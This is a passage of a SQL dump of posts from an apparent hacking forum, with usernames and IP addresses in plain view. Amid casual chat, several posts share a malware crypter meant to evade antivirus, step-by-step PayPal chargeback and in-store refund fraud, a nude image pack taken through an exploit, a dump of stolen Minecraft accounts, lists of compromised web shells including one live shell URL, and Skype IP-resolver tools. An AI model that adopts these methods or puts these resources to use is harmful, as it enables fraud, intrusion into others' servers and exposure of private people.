more active members that will post HQ stuff.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '2f512d33fc8754aefae182721081269c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2797', '558', '2769', '33', 'RE: Guess this font?', '0', '82', 'iTzIpod', '1348921028', 'Yeah but I was just trying to see if any of our members know what font this is.. So.. I\'ll try to ask Dafont.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '59e9848f04db6ec8a7e69e056c99375e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2798', '431', '1957', '61', 'RE: [Free] R?????zo?\'s GFX Service', '0', '82', 'iTzIpod', '1348921095', '@Reloadzor, good enough. :p I guess you got a point. I had that issue before and didn\'t know why. Thanks for the Userbar though. I\'m glad you\'re Unique.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'adaac299518645088774addb9e0c6fc2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2799', '528', '2653', '7', 'RE: [Milestone] Reached 700 posts', '0', '82', 'iTzIpod', '1348921158', 'Thanks everyone! Trying to go for 800, then 900, and then 1,000 ! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd05f9d3b56c3233b1f507ae855b5fa26', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2800', '561', '2790', '24', 'RE: What Antivirus are you running and why?', '0', '82', 'iTzIpod', '1348921236', 'I use MalwareBytes, and Norton 360. Don\'t really have any reason. Because I just wanna be \"Safe\" :p Uh. I also don\'t download much programs. And if I do, I run it in Sandboxie in case.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ecc63444819905bfda0387cf1dd96502', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2801', '562', '2791', '7', 'RE: World\'s Longest Email Address', '0', '82', 'iTzIpod', '1348921310', 'Seems legit. :p But I don\'t feel like owning 17 emails now :p My brain is gonna die if I keep too many passwords in there. I\'m serious..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aa5891b94ab662e5c50f580f11cc3c63', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2802', '564', '2793', '7', 'RE: What Do You Do To Relax?', '0', '82', 'iTzIpod', '1348921401', 'I just play some video games. (PS3 CoD) Or, play some computer games such as Minecraft, LoL, etc. Or, hang out on Skype talk to my friends. Or talk to my friends on facebook. Call some people. Party Do homework? :p (School days/Weekdays I guess) Since I have to finish it.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7453a2cbc1597c82acd362c0fe956be7', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2803', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '205', 'mothered', '1348921694', 'What an amazing story. Who knows whether It\'s factual. I personally can\'t see anyone living on water alone, for that period of time.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '846259da1c6853f3c7463a0ff519925c', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2945', '190', '665', '56', 'RE: Copy and paste game', '0', '199', 'Anonymous™', '1348993673', 'Hello ***** ****** We have completed our investigation of the transaction below and were unable to find evidence of unauthorized access to the buyer’s account. This case was denied to the buyer and no funds were recovered from your account.', '85.230.50.38', '1441149478', '1', '0', '0', '0', '1', 'fa7a0c70de6e4c2ca66a53cc783e7ed2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2805', '266', '1186', '47', 'RE: Win a Free Netflix Account~', '0', '100', '??zg???g????61', '1348924769', 'Lol it seems like me and sirchamp are the only participants, how bout we see who wins?', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '4ad97c67ba2cb72d6415916a764e8d94', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2806', '565', '0', '20', '[FREE] CHROME CRYPTER | FUD [FREE]', '0', '100', '??zg???g????61', '1348925569', '[align=center][img]http://i.imgur.com/SMzeY.png[/img] [img]http://i.imgur.com/vzO5c.png[/img] Download : http://www.mediafire.com/?q24fp0ua6n65nfb This isn\'t my crypter, I got this from a HF post, but I thought it was HQ enough to share here ;D enjoy.[/align]', '65.96.215.138', '1096865674', '1', '0', '100', '1348925626', '1', 'd8bac8c320cef1e0c059542a574fcd4f', '0', '1348925626'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2807', '494', '2406', '42', 'RE: Chinese Man Has Lived on Water Alone for the Last 12 Years', '0', '82', 'iTzIpod', '1348932141', 'I agree with you 100%. Who knows?', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '1998e8d5235af9c11ecd311e504fd25e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2809', '515', '2552', '3', 'RE: [Announcement] MyBBTopSites Vote For L33tHacking', '0', '82', 'iTzIpod', '1348932404', 'They changed their domains from MyBBTopSites to ForumTopSites.net/ I don\'t think L33tHacking is on there so.. t3h jok3r should be informed of this', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8864f84ba0067afb7f92047b97dd56d2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2810', '566', '0', '16', 'Free Xbox360 Points/XBL Gold Method', '0', '82', 'iTzIpod', '1348932963', 'First this is a method that requires the following [list] [*]A Paypal Account [*]Money In your PP [*]Abit of SE skills. [*]Patience [/list] Now head over [url=http://electronicfirst.com/]here[/url] and go to the xbox 360 section, choose either a XBL code or points, but make sure it\'s region free otherwise you won\'t get your money back. Now once You choose the product add it to your basket then click the paypal checkout button then pay for it and then go back to paypal. Find your transaction you made for the XBL product and open a dispute over it say something like it was invalid or not working. or if you don\'t want to dispute it email them [url=http://electronicfirst.com/support-with-xbox-live-codes-microsoft-points/contact-electronic-first/]here[/url] and ay something like \"Hello, I recently bought a xbox 360 code and when I tried to redeem it it said it was Invalid, this was a region free code.\" Please note when you contact them you need to Socially engineer them. Now you either wait for them to contact you back or if you disputed it on paypal wait till it gets recovered heres proof i got my money back when I disputed the payment: [img]http://puu.sh/17puc[/img] Thanks and enjoy. Also you don\'t just need to do this on 1 site you can do it on a few. Hope it helps.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '219609821d533d63e1c8dfcedad54b18', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2811', '567', '0', '16', 'How to SE McDonalds', '0', '82', 'iTzIpod', '1348933081', '1. Find a busy McDonalds 2. Walk to the counter and say you just came from the drive through and they completely messed your order up. 3. If they ask for a receipt say you threw it away with your food. 4. Now wait for a replacement :3 *I use this to get free Chicken Nuggets like once per week haha it works 8/10 times', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b5e9ffa3fed7f20d44c932b66e0174e5', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2812', '568', '0', '61', '500+ pictures of same girl E-Whore pack', '0', '82', 'iTzIpod', '1348933347', 'Got this from the uploadnsell exploit program Girl is actually decent looking :hurr: What is included: Over 500 images of a girl, nude and not. Good quality images, girl 7/10 in my book. Have fun with whatever you use this for! Preview [spoiler][img]http://desmond.imageshack.us/Himg805/scaled.php?server=805&filename=picture255u.jpg&res=landing[/img][/spoiler] 29.8 MB file, and there\'s not even AdFly, just a straight link to uppit :) enjoy! [url=http://uppit.com/bkv1qlu6m5n1/my_cam_pics.rar][color=#32CD32]Click4N00dz[/color][/url] [color=#FF0000][url=http://anubis.iseclab.org/?action=result&task_id=13aed453ac00bbca45190fd9498db73ca&format=html]VirusScan[/url][/color] Edit on virus scan: Anyone know why it says iexplorer.exe? The entire pack is just pictures, maybe someone can teach me how to scan properly- Thanks.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'de9ace878e3e6c5091d8f505b9bf58f4', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2813', '569', '0', '74', '21,000 Minecraft Account Dump', '0', '82', 'iTzIpod', '1348933647', 'Sorry if some don\'t work just seen this on a forum. To View: http://adf.ly/DHxyq To View Mirror: http://adf.ly/DHy1h To Download: http://adf.ly/DHy2x Enjoy. Please don\'t leech. Post a thanks! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '87758cda95302117265692e6ef2dac40', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2814', '570', '0', '61', 'Adf.ly + Adfoc.us Bot', '0', '82', 'iTzIpod', '1348933809', '[color=#FF0000][size=large]Hey guys, I\'m leaking another program![/size][/color] [color=#FF4500]This is a really simple to use! Check it out.[/color] Works with [b]Adf.ly[/b] links and [b]Adfoc.us[/b] links! [color=#FF4500][size=large][b]ScreenShots:[/b][/size][/color] [img]http://img706.imageshack.us/img706/480/adflybot.png[/img] [color=#FF1493][b]Proof :[/b][/color] [img]http://img69.imageshack.us/img69/4334/58c0cba72724492d8b90e18.png[/img] [url=https://www.virustotal.com/file/af40b97913f588202d60633d61a51cf1658858d146e147364008f521b7bd812c/analysis/]Virus Scan [Click Here][/url] [url=http://www.mediafire.com/?y1uwytnnfvc224n]Download link [Click Here][/url]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8aad78e9e2ebda8322343611e05b8ce8', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2815', '571', '0', '61', 'Skype Resolver|Domain Resolver|Pinger|Skype Spam Bot|Mass Messeger All In One!', '0', '82', 'iTzIpod', '1348933887', '[b]It\'s a useful tool that I would like to share with you guys . [/b] [b][url=https://www.virustotal.com/file/3875028447649fa184f89a8a7b2d2445a5c19d6a5fd4698d83c255ba9a0451d3/analysis/1348825401/]Virus Scan[/url][/b] [b][url=http://www.mediafire.com/?bt1zzptoxpi8jzs]Download[/url][/b] [b]And just incase:[/b] [img]http://gyazo.com/07e199452554ed6293330fd56ddb0c3f.png?1348824142[/img] Enjoy and please leave a comment :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b560e22ddd5495555b26a75b8683a74f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2816', '572', '0', '61', 'Another Webbased Skype IP Resolver', '0', '82', 'iTzIpod', '1348933993', 'URL: http://dusti.3eeweb.com/resolver.php Enjoy. - iTzIpod', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0cf47c84baf89270bc2665cdf11e945e', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2817', '573', '0', '61', 'Free Skype API Source', '0', '82', 'iTzIpod', '1348934091', 'This is the source to make a skype api http://www.mediafire.com/?8jg1wn994gjfhb3 Download link ^^^^ Instructions Skype Resolver API Setup ------------------------ These are instructions for setting up the Skype resolver api on a windows VPS from scratch by DeadCode. There is a possibility that Skype will block the account you use for this, so make sure you don\'t use your own, and don\'t use your own from the same IP address as the resolver. Changing account and IP address will let the resolver work again. The php script has an option of outputting json or pure text which is configurable on line 3 by setting $json = true or $json = false. If you can\'t manage any of these steps, or figure out something if it\'s slightly different than I\'ve described, this is not for you. Do NOT PM me about it. DO NOT PM ME ABOUT IT, I WILL NOT HELP YOU. 1. Download and install Microsoft .NET Framework 4: http://www.microsoft.com/en-gb/download/details.aspx?id=17718 2. Download and install WAMP: http://www.wampserver.com/ 3. Click the WAMP icon in the system tray and click \'Put Online\'. 4. Once that is set up, go to services and disable the \'wampapache\' service from starting up, and stop the service from running. Instructions on disbaling a service are here, if you aren\'t sure how: http://technet.microsoft.com/en-us/library/bb124687(v=exchg.65).aspx 5. Go to \'C:\\wamp\\bin\\apache\\Apache*****\\bin\\\' and run \'httpd.exe\'. It should appear as a black console window. Leave it running. 6. Copy the \'SDKs\' folder to the root of the C: drive. You should have \'C:\\SDKs\\skype\\Skype4COM.dll\' and \'C:\\SDKs\\skype\\Skype4COMLib.dll\' when this is done. 7. Open your \'C:\\wamp\\www\\\' folder and copy \'index.php\', \'Skype4ComUserProfile.exe\' and the \'skype\' folder into it. If you\'d prefer to build your own exe instead of using mine, open the Skype4COMUserProfile project in visual studio and build it. You\'ll need to copy \'Skype4COMUserProfile.exe\' out of the \'Skype4COMUserProfile\\Skype4COMUserProfile\\bin\\Release\\\' folder into the \'C:\\wamp\\www\\\' folder. 8. Run the \'logging-on.reg\' file in the \'C:\\wamp\\www\\skype\\\' folder and allow it to be added to the registry. This allows skype to write the log files which the php script reads for IP addresses. 9. Run \'skype55_patched.exe\' and register and login to a NEW account. 10. Everything is set up, we just need to allow our program to interact with skype. 11. Go to \'http://localhost/index.php?name=echo123\' in a browser. Skype should flash up and show a message asking if \'Skype4COMUserProfile.exe\' is allowed to communicate with it. Click allow, and we\'re done! 12. Your Skype resolver is running. There is no protection from crashes, though if Skype is not running the php script will return an error if in json mode. Skype and httpd.exe need to be running at all times. If they aren\'t, it wont work. Make sure you don\'t log out of your vps. Too big for a Virus Scan sorry.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e265cf4a54cf40e036c01d8c604e66c9', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2818', '574', '0', '61', 'Clean Thread Design', '0', '82', 'iTzIpod', '1348934403', '[url=http://www.mediafire.com/?ge65xaf145w4fsn]Download Link (Mediafire)[/url] [b]Please post if this helped![/b] [img]http://imgf.tw/718629387.png[/img]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ff8ae1e37ee806fbd1198a6128c4aa4f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2819', '575', '0', '61', 'Free Ultimate Design Pack Size 2.4GB+', '0', '82', 'iTzIpod', '1348934483', 'I\'ll make this quick cause I don\'t have a lot of time. I am giving out a compilation of all the graphic packs I have acquired over the last month or two of designing websites. These are some of my favorites. I also included some stuff for designing YouTube background\'s etc. [align=center][size=medium][b][color=#9400D3]Here is what is in the pack:[/color][/b][/size] [img]http://gyazo.com/d82f6dbcb19dbbcb5c494c19d11078a7.png[/img] [img]http://gyazo.com/7aaaa5eb3f7b165df00e5638c2e44fd5.png[/img] [img]http://gyazo.com/de8981b17f7edd3a54b4eb7285f0e5ce.png[/img] [img]http://gyazo.com/f9534ee46855b5a1568b3a77269992ce.png[/img] [img]http://gyazo.com/28ec1c5d4bcbafbdf51f76af831a5d53.png[/img] [img]http://gyazo.com/473fb7c88620a55f3885d6d657551f36.png[/img] [img]http://gyazo.com/19aeba66144287a6ef3a71b8896ec63e.png[/img] [b][color=#9400D3][size=medium]Download Links:[/size][/color][/b] There are 5 parts and together it is around 2.5gb. [url=http://adf.ly/D377a]Part 01[/url] [url=http://adf.ly/D37TE]Part 02[/url] [url=http://adf.ly/D37Wn]Part 03[/url] [url=http://adf.ly/D37YX]Part 04[/url] [url=http://adf.ly/D37b4]Part 05[/url] All of the packs should still contain the credits of the original authors. Enjoy[/align]', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bc72873d9aff73b10da958d768397239', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2820', '564', '2793', '7', 'RE: What Do You Do To Relax?', '0', '53', 'sirchamp', '1348939740', 'I sit on a couch and read a book. Or sometimes I play Call of Duty or oblivion. And the odd time, only with my friends, I smoke weed.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '24065f5b3af188e527080570651a77da', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2821', '565', '2806', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '203', 'NeonLights', '1348941725', 'What version is this? and is it still FUD? because version 4.9 isnt FUD...', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '9e0a0f48df5fdc2b3a87970c78f4a023', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2822', '565', '2806', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '100', '??zg???g????61', '1348941886', 'Oh, well in that case it may not be FUD, again I just got this from HF.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '87fd0bdeeeb43aee12eace3576ed269f', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2823', '564', '2793', '7', 'RE: What Do You Do To Relax?', '0', '100', '??zg???g????61', '1348942265', 'I go on L33T hacking xD other then that, I work on my Booter and my other programs I\'m coding these days.', '65.96.215.138', '1096865674', '1', '0', '0', '0', '1', '77d970f80dd3bfbccc84009b1fe5d02d', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2824', '565', '2822', '20', 'RE: [FREE] CHROME CRYPTER | FUD [FREE]', '0', '203', 'NeonLights', '1348943126', '[quote=\'GRONgamer61\' pid=\'2822\' dateline=\'1348941886\'] Oh, well in that case it may not be FUD, again I just got this from HF. [/quote] alright :) was just checking cuz ive used chrom before and there products arent the best but nice share anyways', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '9449ff2f80988783713e3c4e9cd75356', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2825', '561', '2790', '24', 'RE: What Antivirus are you running and why?', '0', '53', 'sirchamp', '1348945023', 'Lol. Who would be so stupid and use 2 Antiviruses. Using 2 antiviruses just make your computer slower and it still wont make your computer safer.', '188.155.56.90', '-1130678182', '1', '0', '53', '1348945043', '1', '3501788f58ed654593bf4f79f22e666c', '0', '1348945043'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2826', '561', '2790', '24', 'RE: What Antivirus are you running and why?', '0', '82', 'iTzIpod', '1348946139', 'My computer is fast. Calm yourself..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '9e0f94102efec2ee80ef1ee927804018', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2827', '564', '2793', '7', 'RE: What Do You Do To Relax?', '0', '203', 'NeonLights', '1348949450', 'well i roll some joints, and i go out with friends to smoke them...', '67.68.75.193', '1128549313', '1', '0', '0', '0', '1', '1fec8c0e66be8f6a969408e8ea1ad9b3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2828', '576', '0', '15', 'The Ultimate HACK PACK', '0', '203', 'NeonLights', '1348949612', '[align=center][img]http://img819.imageshack.us/img819/8806/hackpack.jpg[/img] [lock]download: http://adf.ly/382489/https://dl.dropbox.com/u/81755269/ULTIMATE%20HACK%20PACK.rar[/lock] i do not know if this is 100% clean so do not blame me if u get a virus...[/align]', '67.68.75.193', '1128549313', '1', '0', '1', '1352011480', '1', '736789b81653422172b59e711bbb1151', '0', '1352011480'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2829', '577', '0', '61', '1,000+ Shells', '0', '82', 'iTzIpod', '1348949964', 'To View: http://adf.ly/DIJa4 To Download: http://adf.ly/DIJbK Didn\'t use a Shells Checker. So some might not work.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '809946715fcb32061a4b821e7b6273b3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2830', '578', '0', '61', 'Fresh Shells', '0', '82', 'iTzIpod', '1348950041', 'LEAKED FROM HF http://183.91.25.214/webdav/boss.php Enjoy. Just exploiting tons of shells. There is one for free. I have about 120 shells exploited right now, getting more shortly. Fresh! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'df9fb39776de67d41133cf8417f921d6', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2831', '579', '0', '61', '3000 Shells (Private and Public)', '0', '82', 'iTzIpod', '1348950196', 'Hello L33thacking.net Here is one more leak by me! (iTzIpod) 3000 exploited shells! http://adf.ly/DIJvR Please leave a \"thanks\" :D', '24.212.197.164', '416597412', '1', '0', '82', '1349039288', '1', 'ac3135a02f6974a738a88c09702275d5', '0', '1349039288'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('2832', '580', '0', '61', '500+ Fresh Elite Proxies', '0', '82', 'iTzIpod', '1348950351', 'Fresh list of proxies! [code]109.202.41.38:808 164.77.196.78:80 213.134.46.16:80 61.155.95.28:8080 79.170.50.25:80 210.21.96.36:80 94.180.123.34:3128 1.192.126.252:3128 112.2.201.197:6675 58.218.172.230:1337 200.63.85.175:8080 202.194.6.227:8909 199.127.102.203:80 61.138.27.5:8080 78.47.5.222:80 60.10.58.38:8090 93.79.180.141:8080 115.55.61.180:6668 58.216.168.138:1337 91.215.63.62:8080 219.231.190.16:6675 103.247.42.190:3128 176.196.170.137:808 59.66.151.136:8909 103.3.221.153:8080 58.210.247.18:1337 24.46.87.73:8123 117.239.57.228:808 46.211.67.113:54321 46.105.20.6:8080 111.223.88.140:8080 218.28.59.149:8080 122.165.225.12:808 222.172.11.23:9000 188.124.131.29:8123 78.221.156.31:3128 109.87.114.119:3128 109.87.140.48:8080 59.49.19.39:1337 176.36.151.85:80 123.236.246.100:808 217.198.151.246:80 221.213.45.94:8090 194.160.184.114:80 59.53.92.2:8090 117.21.190.51:8090 110.164.82.5:80 110.164.82.5:8080 59.53.92.4:8090 110.53.48.54:8080 195.16.49.214:80 92.50.133.26:88 202.116.160.89:80 92.50.133.26:81 92.50.133.26:8888 196.216.48.67:8080 117.239.16.114:6588 123.11.167.117:6675 115.252.100.245:6588 115.248.245.235:8080 59.53.92.6:8090 112.125.42.20:10080 222.220.34.74:1337 60.63.221.131:6675 211.53.208.125:6666 112.213.109.46:80 112.216.29.245:80 199.127.56.223:3128 117.43.25.34:6666 109.191.219.255:3128 221.130.81.175:1337 60.10.58.62:8090 123.176.60.254:80 221.6.15.157:80 188.135.5.226:8080 124.205.18.183:80 113.106.99.206:9000 05.9.229.146:808 37.59.209.146:808 05.39.37.139:808 113.143.198.113:6668 190.152.99.165:3128 200.239.66.22:443 193.53.4.252:8080 200.143.132.99:80 113.230.76.234:443 113.230.76.234:80 113.243.60.179:6668 111.223.88.138:8080 174.137.152.60:8080 211.154.83.39:82 211.154.83.39:80 218.15.24.67:808 222.111.123.83:3128 222.178.37.42:1337 114.135.23.126:6668 212.170.181.90:8080 210.212.29.147:8080 218.108.168.166:82 202.8.209.78:8080 121.14.59.70:80 124.89.36.178:80 114.80.149.183:80 184.106.205.131:80 115.216.140.220:6668 24.222.195.163:8123 72.44.90.84:8083 